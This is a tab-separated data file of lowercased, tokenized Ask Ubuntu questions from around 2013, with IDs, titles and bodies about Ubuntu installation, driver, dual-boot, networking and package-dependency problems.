381690	ia32-libs issue	i had my firestorm running ok but since i installed new cuda 5.5 it stop working , when i try to update it says itâs up to date , gives me the following message . my ubuntu is 12.04 , running on i7 processor , and nvidia geforce 640 any idea thanks shams @ ubuntu : ~ $ sudo apt-get install ia32-libs [ sudo ] password for shams : reading package lists ... done building dependency tree reading state information ... done ia32-libs is already the newest version . the following packages were automatically installed and are no longer required : libcublas4 libnpp4 libvdpau-dev gir1.2-ubuntuoneui-3.0 libcudart4 g++-4.4 libcurand4 nvidia-opencl-dev nvidia-cuda-dev nvidia-cuda-doc nvidia-cuda-gdb libqtassistantclient4 opencl-headers libubuntuoneui-3.0-1 thunderbird-globalmenu libcusparse4 nvidia-compute-profiler libthrust-dev libcufft4 libstdc++6-4.4-dev use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 1704 not upgraded .
381691	adobe flash player fullscreen bug	for a few days i 've been experiencing a really strange behaviour when watching youtube videos in fullscreen . it looks like this : as you can see , the video stays the same size as it had in embedded mode . it just moved to the top left corner and the space was filled with black . i 'd be glad for some help , for this is really annoying . ps : raring x64 , browser : chromium v 30.0
381695	bcm4313 stopped detecting some wifi networks	the driver suddenly stopped detecting my wifi network . but it is showing other networks available . also , i have n't done any updates done at that moment . i have spent almost 10 hrs googling before posting this question . i am really tired . still i do n't want to loose ubuntu experience . my laptop setup : lenovo g580 wireless card : bcm 4313 linux kernel : 3.5.0.43 ubuntu : 12.04.3 lts things i tried so far : i was already using a downgraded bcmwl kernel , source bcmwl 5.100.82.112 . when this problem came up . i purged it and tried to re-install . then i got a problem with the module . i then installed 3.5.0.43 headers as suggested in ubuntu forum , but it did n't work . so i ca n't re-install . trying to use the bcwml 6.20.155.1+bdcom-0ubuntu0.0.2 , but that did n't work . firmware , sta common , sta source tried . no result . trying lwconfig , lwlist scan . that kind of stuff . but it does not detect my network . can somebody give me a precise method to get my wifi network back ? it is working fine with windows 7 . so this is n't a problem with my router .
381696	mplayer video screen is disappearing	when i am trying to open any video file [ .mp4 , .mkv , .flv so far ] with mplayer from right click context menu on nautilus , the following things are happening : audio is playing but video playing screen is just disappearing . the control box is still there and able to pause , stop etc from it . sometimes after pausing/stopping the file , video screen is appearing and mplayer is freezing . to stop it i had to kill it . if i run those same videos with mplayer from a terminal everything is fine without any issue . only the control box is not there ( i think this is default , i do n't have an issue with it ) .
381697	ubuntu and hp pavilion 15e069sl	does wi-fi connection works on hp pavilion 15e069sl if i install the latest version of ubuntu on it ? if it does n't work where can i find the drivers to make it run ?
381699	xscreensaver in 12.04 lts	what settings do i need to make the xscreensaver just , i.e . only , to show images randomly from my pictures folder ? /danharry
381701	can not load windows xp after deleting ubunutu partition	i would first like to point out that i am extremely new to running different operating systems ( dual booting etc . ) and linux in general but after having continous issues with xp , trying linux i considered was a viable option . i installed ubuntu 13.10 using the live usb method ( created in universal usb creater ) and it installed fine as a separate partition . when it started up for the first i noticed that it was running pretty slow e.g . the menus were sluggish . after a serious session of googling , a potential solution was to update/change the display driver but ultimately did not improve the issue . consequently , i opted to get rid ubuntu in order to downgrade or find a lighter version of linux altogether and i did this , perhaps mistakenly , by deleting the paritition using xp . now when i turn on my pc i am greeted with a black screen and a message that says partition missing ... after another intense googling session it seems that many solutions begin with the verification of its filesystem name using `` f disk -1 '' . however , the command comes up that `` -1 '' is invalid and does not list the filesystem name . after a couple of long nights wielding no results , i thought it was time seek expert help and any help is greatly appreciated thanks in advance antony
381703	increase/extend ( resize ) os x partition with gparted	i have a mac and am dual booting ubuntu . i booted from a usb and used gparted to shrink the ubuntu partition leaving me with about 100g of free space . i want to use this to increase the os x partition space . gparted will not let me increase the os x partition size ( although it will let me decrease it ) . i 've also tried using disk utility from os x . when i had the 100g of unallocated space , disk utility would report `` mediakit reports partition ( map ) too small . '' i also tried creating a new partition of both `` unformatted '' and `` cleared . '' now when i use disk utility , it says `` preparing to resize , '' but does n't move on . it does n't lock up , but even after half an hour it is still `` preparing to resize . '' gparted still ca n't increase the os x partition size either ( same as before ) . i also ca n't create an hfs+ partition with the unallocated space . the option is there , but it is grayed out . i 've seen this question , but the solutions all involve booting the os x cd , which i do not have . using df does not list the os x partition either , but ubuntu does not appear to have gpt anyway . in general , i 've read that i need to repair the partition table , but the only ways from os x that i 've found to do this require having a cd to boot from . i 've also read that since i used gparted to create the free space , i need to use gparted to resize the partition or at least put it in a resizable state , but nothing i 've done will allow me to resize the os x partition .
381704	installing skype on 64-bit breaks on dpkg -- add-architecture i386	it is supposed to be easy process : sudo dpkg -- add-architecture i386 sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update sudo apt-get install skype but on the first line dpkg -- add-architecture i386 i get an error dpkg : error : unknown option -- add-architecture type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! how to solve this so that i can finally install skype ? edit in synaptic i get error the following packages have unmet dependencies : skype : depends : skype-bin but it is a virtual package if i try to install skype-bin , i get error : the following packages have unmet dependencies : skype-bin : i386 : depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
381707	connection to the internet keeps dropping on acer netbook	i 've been trying to connect from my netbook ( ehh , i know , i am working on getting a better computer ) to my wi-fi and it loads then it drops it .
381710	unable to boot windows 7 after installing ubuntu 12.04.3 lts	after installing ubuntu 12.04.3 lts i was unable to boot windows 7 nor its recovery partition they both appear in the boot menu but they dont manage to work . i 've tried using boot-repair without success . here is the output of it - http : //paste.ubuntu.com/6470381/
381712	can not compile liveusb-creator-3.11.8	whenever i try to do ./configure i get : bash : ./configure : no such file or directory i try to do sudo make and the terminal gives me : make : dist is up to date . so i try sudo checkinstall and that gives me : checkinstall 1.6.2 , copyright 2009 felipe eduardo sanchez diaz duran this software is released under the gnu gpl . ***************************************** **** debian package creation selected *** ***************************************** this package will be built according to these values : 0 - maintainer : [ root @ ryan-laptop ] 1 - summary : [ fedora liveusb creator ] 2 - name : [ liveusb-creator ] 3 - version : [ 3.11.8 ] 4 - release : [ 1 ] 5 - license : [ gpl ] 6 - group : [ checkinstall ] 7 - architecture : [ amd64 ] 8 - source location : [ liveusb-creator-3.11.8 ] 9 - alternate source location : [ ] 10 - requires : [ ] 11 - provides : [ liveusb-creator ] 12 - conflicts : [ ] 13 - replaces : [ ] enter a number to change any of them or press enter to continue : installing with make install ... ========================= installation results =========================== make : *** no rule to make target `install ' . stop . **** installation failed . aborting package creation . cleaning up ... ok bye . how do i fix this ?
381713	install a graphic driver is it really necessary ?	i 'm just start using ubuntu , a few months but just for fun ( having a diferent so , : ) ... ) but now i want to improve and understand some things : when i installed ubuntu 13 , it came with a `` gallium 0.4 on amd cedar '' and i would like to know if this is the correct driver for my graphic ( my pc : hp i5 ati-mobility radeon ) or if i have to install a correct driver and install a graphic driver is it really necessary for some softwares in this os ?
381714	missing `` server '' tab on printer settings	when i go to system settings = > printers , there is no tab for server settings . how to i get that so i can set ubuntu as a print server ?
381715	xen-hypervisor-amd64 , ubuntu 13 , asus laptop issues	working to get xen running on an asus laptop . model q301l . currently , ubuntu 13 loads up just fine , and xen added itself to grub2 menu loader correctly . however , when i select the ubuntu w/xen option , a warning flashes very briefly , telling me that there will be no console available to the os - and then it flashes a few times and returns me to the grub menu . if i enable csm legacy boot , it dies and spews hexcodes to the terminal , rather than flashing and returning to the grub menu . any insight into how to troubleshoot this ? i 'd prefer xen to vmware .
381719	enable eth0 and pppoe connection at the same time in ubuntu	how to keep enable eth0 and pppoe connection at the same time . when i connect my broadband cable in eth0 port , it shows ip detected in eth0 ( ifconfig ) . now when i connect dsl connection eth0 's ip goes away and a new interface added named pppoe with different ip address . how to enable both interface in the same time ? windows can keep both enable at the same time .
381720	is there a way to get amnesia the dark descent working on ubuntu with an inel hd integrated graphics card ?	solved : now you can run amnesia even on computers which do not have external graphics card and have only intel hd graphics card ! why ? amnesia needs s3tc support which the open source drivers that come with the os do not support . installing libtxc-dxtn-s2tc0 solves it !
381726	keyboard layout switch without doing from de to en	i 'm using ubuntu 13.10 , and this problem occurs after updating from 13.04 : i 'm starting ubuntu , the keyboard layout is set to german , what i need . but while working , it can change random to the englisch layout . when this occurs , i must only type str+alt+f1 to switch to the console and then str+alt+f7 to switch back , and the tastatur works well as nothing has happened . what can be the problem ? ( i have deactivate switching to other keyboard layouts with super+space )
381729	how to configure initial 12.04 for squid	good day , i would like to know how to configure a squid on ubuntu 12.04 , i have been trying with no apparent success for the past week and am really getting quite fustrated ! i would appreciate simple instructions that would not make me go round and round and or get more confused as i am a newbie in linux and i need to get this accomplished asap before my boss gets back this week ! one of my problems was that i could not route thru the 2nd nic , i could browse on the machine but if i attach a laptop to the other interface i ca n't browse . that was the beginning of my problems . i did some things i read online and my pc now when it boots tells me it 's looking at the network for like about 5minutes or so then eventually boots without it ! i finally got around that and got my network back on my ubuntu and decided that i should come here to ask for help as i got into trouble where u went last ! i will really appreciate any form of help you can give me . thanks
381730	how to fix the screen being to bright in ubuntu 12.04 and up	how to fix the screen brightness and color being too bright in ubuntu .
381733	external hardware freeze	on my pc with linux lite 12.04 lts , whenever i do tasks involving scrolling text in a terminal , updating software , or sometimes just random other things , every external device stops working . the mouse , keyboard , and any other devices just freeze . they only thing that works is the power button , but that just opens the power menu so i ca n't do anything . i am forced to cut the power and boot back up . after several times , the hard drive got corrupted ( good thing i made a backup ) . before i restore from the backup , how do i fix this ?
381739	ubuntu on toshiba p50-12z with nvidia optimus	im trying boot ubuntu on a toshiba p50-12z , already disable secure boot and build-in lan . when i boot ubuntu and select `` try ubuntu without install '' or `` install ubuntu '' it freezes on startup splash ( purple screen with dots ... ) maybe the reasons is my nvidia geforce gt 745m with cuda and nvidia optimus . anyone know how to solve this ? thanks
381744	gtk3+ keyboard shortcuts without signal matching	i am in the process of creating my first gtk3+ application using python , and i am quite frustrated with the lack of documentation : ( well , what i 'm trying to do is to configure the delete button to remove an item from my treeview , and i do n't have a remove button in order to bind the `` clicked '' signal of it for my code . this is my code : def make_shortcuts ( self ) : self.my_accelerators = gtk.accelgroup ( ) self.add_accel_group ( self.my_accelerators ) self.add_accelerator ( self.treeview , `` < delete > '' , signal= '' ? ? ? '' ) def add_accelerator ( self , widget , accelerator , signal= '' activate '' ) : if accelerator is not none : key , mod = gtk.accelerator_parse ( accelerator ) widget.add_accelerator ( signal , self.my_accelerators , key , mod , gtk.accelflags.visible ) i do n't get how a keyboard shortcut must be binded to a signal and not to a function . binding to a function is way more flexible . is there any way i can bind a keyboard shortcut to a function ?
381745	ca n't map windows group to unix group	i have a fresh install of samba and would like to map the windows group to the unix group but i keep receiving the error `` ca n't lookup unix group domainadmins '' i 'm using the following command : sudo net groupmap add ntgroup= '' domain admins '' unixgroup=domainadmins rid=512 type=d i 've also tried : sudo net groupmap add rid=512 unixgroup=domadmins type=d ntgroup= '' domain admins '' i think this is because there is no unix group called `` domainadmins '' . if anybody could give me some direction in creating the unix group it would really help . running ubuntu 12.04 desktop . i have been following this danbishop.org guide to setup this box . i 've checked the log file and this is what it displays : smbd/server.c:1107 ( main ) standard input is not a socket , assuming -d option '' so how to solve this issue ?
381746	java blocked due to security level on ubuntu 13.10	java being blocked because of security level . however , i am aunable to alter security levels in ubuntu . i have dated to the latest java : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java8-installer pst007x @ pst007x-serval-professional : ~ $ java -version java version `` 1.7.0_45 '' java ( tm ) se runtime environment ( build 1.7.0_45-b18 ) java hotspot ( tm ) 64-bit server vm ( build 24.45-b08 , mixed mode ) i get the error : java ( tm ) was blocked because it is out of date : run this time ? / update ? i select : run this time then a pop up : your java version is out of date . click update to install the recommended latest version . click block to stop java content in your browser or later to continue and be reminded again later . i select later , then it fails , saying : your security settings have blocked the application from running with an out of date or expired version of java ... . but i am running the latest linux version ... has ubuntu stopped supporting java now ? help please ! : - ) java website : verified java version completion checkmark congratulations ! you have the recommended java installed ( 1.8.0-ea ) . this is the site that fails : jpl
381748	installing ubuntu on 2 drives	if i have a 32 gb ssd and a 1tb hdd can i put /usr and /home on the 1tb and root on the ssd , or is the 32 gb ssd still not big enough for the os ? is there a different or better configuration i should use ?
381749	dual boot , ubuntu wo n't shut down	i have ubuntu 13.10 installed alongside win8 . when i try to shut down ubuntu it either freezes with the purple `` ubuntu screen '' ( identical to the one at startup ) or it freezes with the following message on a black screen : broadcast message from root @ jokifi ( unknown ) at hh : mm âś the system is going down for power off now ! acpid : exiting speech-dispatcher disaled ; edit /etc/default/speech-dispatcher restart however works fine .
381750	`` can not create directory '' installing solr	installing solr 4.5.1 and tomcat7 ... tomcat is working but solr is not . i get this error message http status 500 - { msg=solrcore 'collection1 ' is not available due to init failure : can not create directory : /usr/share/solr-4.5.1/example/solr/collection1/data/index , trace=org.apache.solr.common.solrexception : solrcore 'collection1 ' is not available due to init failure : can not create directory : /usr/share/solr-4.5.1/example/solr/collection1/data/index at org.apache.solr.core.corecontainer.getcore ( corecontainer.java:783 ) at org.apache.solr.servlet.solrdispatchfilter.dofilter ( solrdispatchfilter.java:295 ) at org.apache.solr.servlet.solrdispatchfilter.dofilter ( solrdispatchfilter.java:195 ) at ... and more has anyone got any idea what is causing this , why is it so complicated to install ! ! ?
381752	installing windows 8 after ubuntu 13.10	so i think i have a unique situation here . my work computer came with windows 8 preinstalled on an ssd . the ssd was needed elsewhere and i got a new one in the mail . to preserve windows 8 , a coworker cloned the operating system to an image file using dd . note i have two drives , an 256gb ssd , and a 1tb sata . i then installed ubuntu 13.10 to my new ssd and it works splendidly . when it came time to dd the image file onto my sata hard drive , the dd went well as well . mounting the filesystem from within ubuntu , all of the files etc are there . this sata is the first connected hard disk ( sda1 ) and windows has the whole partition to itself . the problem : grub wo n't recognize windows 8 . it was a factory install which means that i believe it was installed with efi . ubuntu currently does not boot in uefi mode . even by restoring the mbr on sda with the default hd to boot being sdb , overriding it to boot to sda which shouldnt have grub and thereby should just try to boot to the disk nothing happens . can someone link me to some relevant resources pertinent to fixing this situation ?
381757	black screen x cursor	i installed ubuntu 13.10 the other day and have been setting it up to my liking and loving every minute of it . today i came across an article entitled 8 things to do after installing ubuntu 13.10 ( saucy salamander ) . so i did the 8 things ; just copied and pasted commands . i rebooted my pc and now all i get after ubuntu loads is some errors and a black screen with an x cursor that i can move around . i can get to the terminal using alt + f2 but i 'm not sure how to fix it . does anyone have a solution or a way to get back the default setting ?
381758	how can i make xfce click when changing the volume ?	in unity , when i change the volume , i 'll see a notification and hear a click sound to indicate the current volume . in xfce , there 's a notification too , but no click . i want to hear a click too . how can i get this done ?
381760	how to undo changes in synaptic package manager	i was trying to uninstall python then reinstall it because some files from it were missing . when i clicked apply changes it uninstalled it started uninstalling things like firefox , compiz and other important programs . the bar on the buttons on the top left corner changed , firefox 's and dash home 's logo changed into a question mark . how do i undo these changes . thank you !
381762	apt-get upgrade failure with libc	i wanted to upgrade the unetbootin package this morning . it was going well until i got this error . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : breaks : libc6 : i386 ( ! = 2.17-0ubuntu5 ) but 2.17-0ubuntu5.1 is installed libc6 : i386 : breaks : libc6 ( ! = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-dbg : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) libc6-dev : i386 : depends : libc-dev-bin : i386 ( = 2.17-0ubuntu5.1 ) recommends : gcc : i386 but it is not installed or c-compiler : i386 libc6-i386 : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-x32 : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed e : unmet dependencies . try using -f. so i did tried the suggested apt-get -f install but that resulted in the following error reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-31 linux-headers-3.2.0-31-generic linux-headers-3.8.0-19 linux-headers-3.8.0-19-generic python-central use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc-dev-bin libc6 suggested packages : glibc-doc the following packages will be upgraded : libc-dev-bin libc6 2 upgraded , 0 newly installed , 0 to remove and 109 not upgraded . 8 not fully installed or removed . need to get 0 b/4,814 kb of archives . after this operation , 6,144 b of additional disk space will be used . do you want to continue [ y/n ] ? preconfiguring packages ... ( reading database ... 661066 files and directories currently installed . ) preparing to replace libc6 : amd64 2.17-0ubuntu5 ( using ... /libc6_2.17-0ubuntu5.1_amd64.deb ) ... a copy of the c library was found in an unexpected directory : '/lib/x86_64-linux-gnu/libc-2.15.so' it is not safe to upgrade the c library in this situation ; please remove that copy of the c library or get it out of '/lib/x86_64-linux-gnu ' and try again . dpkg : error processing /var/cache/apt/archives/libc6_2.17-0ubuntu5.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/libc6_2.17-0ubuntu5.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried apt-get clean apt-get update & & apt-get upgrade but that did n't help either . the same errors are occurring . i 'm a little uncertain as to whether i dare to reboot . how do i fix this ? output of apt-cache policy libc6 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : breaks : libc6 : i386 ( ! = 2.17-0ubuntu5 ) but 2.17-0ubuntu5.1 is installed libc6 : i386 : breaks : libc6 ( ! = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-dbg : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) libc6-dev : i386 : depends : libc-dev-bin : i386 ( = 2.17-0ubuntu5.1 ) recommends : gcc : i386 but it is not installed or c-compiler : i386 libc6-i386 : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed libc6-x32 : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is installed e : unmet dependencies . try using -f .
381768	tried ubuntu live ; now can not boot windows 7 ?	earlier today , i placed an ubuntu 12.04 disk in my computer to boot into ubuntu live . i pressed esc to get into the boot order setup and chose to boot from the cd-rom . everything went smoothly and i used live for a while . i went to power down the computer and ejected the disk and pressed enter when it said to , shutting down without a problem . however , when i turned the computer back on to boot windows 7 , nothing comes up except for a small blinking cursor in the upper left corner , and it just sits there . how can i fix this ? note : before i put the 12.04 disk in , i was going to try 6.10 , so i put that disk in . that disk had been included with a library book i had rented about linux , so it had been used previously . when it was loading , i decided to eject the disk and try 12.04 instead ; mainly because i was n't sure whether it was installing or just booting into live . i was pretty sure that i had selected to try it , not install it , but a loading screen sat there for a while , so i ejected it before it finished because i did n't want anything installed . after ejecting and powering down , i booted windows to be sure it worked , and it came up just fine . the problems arose after trying ubuntu 12.04 live . i 'm thinking it might be video card problem , but i 'm not sure . a test said that the hard-drive was working just fine .
381774	ubuntu 13.10 64bit issue with broken dependencies	i 've been trying to install google earth and get these dependency issues related to lsb-core . when i try to install lsb-core i get more dependency issues with it . jacob @ jacob-desktop : ~ $ sudo apt-get install lsb-core reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : google-earth-stable : depends : ia32-libs but it is not installable lsb-core : depends : lsb-invalid-mta ( > = 4.1+debian11ubuntu4 ) but it is not going to be installed or mail-transport-agent depends : at depends : m4 depends : mailx or mailutils but it is not going to be installed depends : ncurses-term but it is not going to be installed depends : pax depends : alien ( > = 8.36 ) but it is not going to be installed depends : libc6-i386 but it is not going to be installed depends : lib32z1 but it is not going to be installed depends : lsb-security ( > = 4.1+debian11ubuntu4 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . any advice ? ?
381777	is it possible to let gcc 4.7 and gcc 4.8 co-exist in ubuntu 13.10	i have some development work , it seems that gcc 4.8 will not work well with other development tools , so i may have to stick with gcc 4.7 , but i am not sure if this is allowed in ubuntu 13.10 ( 64bit ) . if yes , can anyone tell me how to install and configure gcc 4.7 here ?
381780	ca n't update repositories ubuntu 13.10	when i run sudo apt-get update i receive the following error message : w : failed to fetch http : //http.us.debian.org/debian/dists/squeeze/release unable to find expected entry 'universe/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . can anyone help ?
381781	increase drive size in ubuntu 12.04 installed with wubi	i installed ubuntu 12.04 through windows vista using wubi . the largest size install it would do is 30gb . i still have lot 's of space left on the partition . how do i increase the usable disk size in ubuntu ?
381786	how can i get past the authentication code stuff if i bought from a used computer vendor	i bought a computer with ubuntu from a pawn shop not knowing that it had this os can someone tell me how i can get past the authenticate code screen because i 'm tired of getting the update stuff when i try to do things .
381787	xrandr always has a vga-1 or vga-2 without physical display	i upgraded to 13.10 and since then have issues with my display detection on my thinkpad e530 . xrandr always finds a vga-1 or vga-2 display and activates it without there being a physical device connected . this always creates problems for my window managers , because they sometimes try to show stuff on the second display which does n't really exit . the lazy solution of just deactiving vga-1 via xrandr -- output vga-1 -- off resulted in now there being a vga-2 , so i think this is not the way to go . what could be the real issue here ? what to do about it ?
381788	panic occurred switching back to text console	i recently reinstalled ubuntu 12.04 . but after i start my machine after sometime ( this time varies ) the window pops up showing the error message : '' kernel panic-not syncing fatal exception in interrupt , panic occurred switching back to console mode '' and freezes completely . please suggest a solution to me .
381789	usb uvc camera only works for 1 or 2 minutes	i have an interesting issue - i am not certain if it is hardware or software related . i have an amd 64 bit install of 13.10 . i recently picked up a uvc compliant celestron digital microscope camera . it works great , with excellent frame rates until about 1 or 2 minutes , then the frame rates drop off to less than 1 frame per minute , and eventually stops transffering images altogether . it does not matter which program i use ( cheese , gtk uvc video viewer , or camorama ) i get the same result . once i stop the software and wait a minute or two the camera behaves normally for 1 or 2 minutes and then the problem starts over . i can keep doing this to get my work done , but it is a tad annoying . i am curious if anybody has any ideas how i can trouble shoot this to determine if it is a hardware or software issue , or has anybody seen this sort of issue before ? thanks in advance . jonathan
381790	i have just installed xubuntu 13.10 and i ca n't find the new partitions	today i did a fresh installation of xubuntu 13.10 on my pc . i had already installed windows 7 , my main os , so i restarted and booted from the xubuntu cd i burnt , to begin the installation . i selected to `` install xubuntu alongside windows 7 '' option and i was expecting to see the next step where you select how much space do you want to dedicate to xubuntu . instead of that , the installation jumped into adjusting my time zone and keyboard layout . as i did n't know what may happen if i cancelled the installation , i let it finish . now i have no idea where xubuntu has installed to ? i have 2 hdds and i ca n't find any new partitions with the disk management utility in windows . i have also checked if i did a wubi installation . any ideas of what may have happened ? i would like to remove the xubuntu installation now but first i need to figure this out .
381791	how do i open the startup disk creator in gnome ?	i 'm using 11.10 ( i think ) and trying to find how how to actaully launch this program ... ? it does n't appear in any of the start menue categories ( especially accessories or system tools - where i might expect to see it ) . it is installed according to the ubuntu software center . should i open it in via a terminal window ? if so , what would be the command ? many thanks for any help that you can give , , ,
381792	lxc-create says container already exists	i 'm trying to create a container on a non-standard location , but lxc-create complains the roots already exists , when , in fact , it seems it does n't . what am i doing wrong ? leon @ ln00 : /media/leon/archive/lxc $ sudo lxc-ls saucy-amd64-chromiumos leon @ ln00 : /media/leon/archive/lxc $ sudo lxc-destroy -n saucy-amd64-chromiumos leon @ ln00 : /media/leon/archive/lxc $ ll total 8 drwxrwxr-x 2 leon leon 4096 nov 24 22:03 ./ drwx -- -- -- 4 leon leon 4096 nov 24 21:49 ../ leon @ ln00 : /media/leon/archive/lxc $ time sudo lxc-create -n saucy-amd64-chromiumos -t ubuntu -b dir -- dir /media/leon/archive/lxc/ -- -r saucy lxc-create : no config file specified , using the default config /etc/lxc/default.conf specified rootfs ( /media/leon/archive/lxc/ ) already exists . bailing . real 0m0.029s user 0m0.004s sys 0m0.008s leon @ ln00 : /media/leon/archive/lxc $ ll total 8 drwxrwxr-x 2 leon leon 4096 nov 24 22:03 ./ drwx -- -- -- 4 leon leon 4096 nov 24 21:49 ../ leon @ ln00 : /media/leon/archive/lxc $ sudo ls -al /var/cache/lxc/ total 8 drwx -- -- -- 2 root root 4096 out 29 16:58 . drwxr-xr-x 24 root root 4096 nov 24 21:53 ..
381793	how can i run microsoft office 2010 in ubuntu 13.10 ?	as a student , i get microsoft office 2010 for free from my university 's website . i know there are programs that let you run things like that in linux , but i 've never used them before so i have no idea where to start . any help would be greatly appreciated .
381798	random wifi disconnect in 13.04 still appears in 13.10	i just bought a 1t hdd and reloaded win8.1 and ubuntu 13.04 and than updated to 13.10 never had this problem before i bought a new hdd had same os 's except i used 13.04 version . it started as soon as i put on 13.04 it was really bad took 5 hrs to update to 13.10 due to disconnects and was hoping the upgrade would fix said issue but did not sadly . i use a usb to get wifi , netgear wireless-n usb adaptor works fine in win8 . how to fix this issue ? edit : bus 002 device 003 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 001 device 005 : id 04ca:004b lite-on technology corp . bus 001 device 004 : id 045e:0728 microsoft corp . bus 001 device 003 : id 0846:9001 netgear , inc. wn111 ( v2 ) rangemax next wireless [ atheros ar9170+ar9101 ] bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
381799	installing google earth in a 64-bit system	ok. solved the problem with lib-core now i get this error . jacob @ jacob-desktop : ~ $ sudo -s dpkg -i google-earth-stable_current_amd64.deb selecting previously unselected package google-earth-stable . ( reading database ... 173493 files and directories currently installed . ) unpacking google-earth-stable ( from google-earth-stable_current_amd64.deb ) ... dpkg : dependency problems prevent configuration of google-earth-stable : google-earth-stable depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing google-earth-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ... errors were encountered while processing : google-earth-stable when i try to install ia32-libs ubuntu tells me it has been replaced with other packages . advice ? ?
381801	setup compilation with qt , boost and muparser	i am a new comer on the ubuntu worldwide and i have to complete a project . i have developed a plugin for librecad with windows . i am now working with ubuntu 13.10 and i would like to compile librecad with my plugin using qt 5.1 . what should i do in order to set up qt with boost 1.48 and muparser ( or equivalent ) ?
381804	failed to initialize the nvidia gpu with nvidia 660m and bumblebee	specifications : clevo w370et ubuntu 13.10 32bt , nvidia 660m , with 319 nvidia drivers installed , the bus id is pci:01:00:0 . and after installing bumblebee using this site . link i still can not run optimus , with the following error : david @ david-w370et : /etc/bumblebee $ sudo optirun -vvv glxgears [ 1802.179456 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1802.180031 ] [ info ] configured driver : nvidia [ 1802.180231 ] [ debug ] optirun version 3.2.1 starting ... [ 1802.180257 ] [ debug ] active configuration : [ 1802.180265 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1802.180273 ] [ debug ] x display : :8 [ 1802.180280 ] [ debug ] ld_library_path : //usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates [ 1802.180288 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1802.180295 ] [ debug ] accel/display bridge : auto [ 1802.180302 ] [ debug ] vgl compression : proxy [ 1802.180309 ] [ debug ] vglrun extra options : [ 1802.180316 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 1802.180373 ] [ debug ] using auto-detected bridge primus [ 1802.376835 ] [ info ] response : no - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 1802.376851 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 1802.376856 ] [ debug ] socket closed . [ 1802.376870 ] [ error ] aborting because fallback start is disabled . [ 1802.376875 ] [ debug ] killing all remaining processes . david @ david-w370et : /etc/bumblebee $ here is my bumblebee.conf : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . 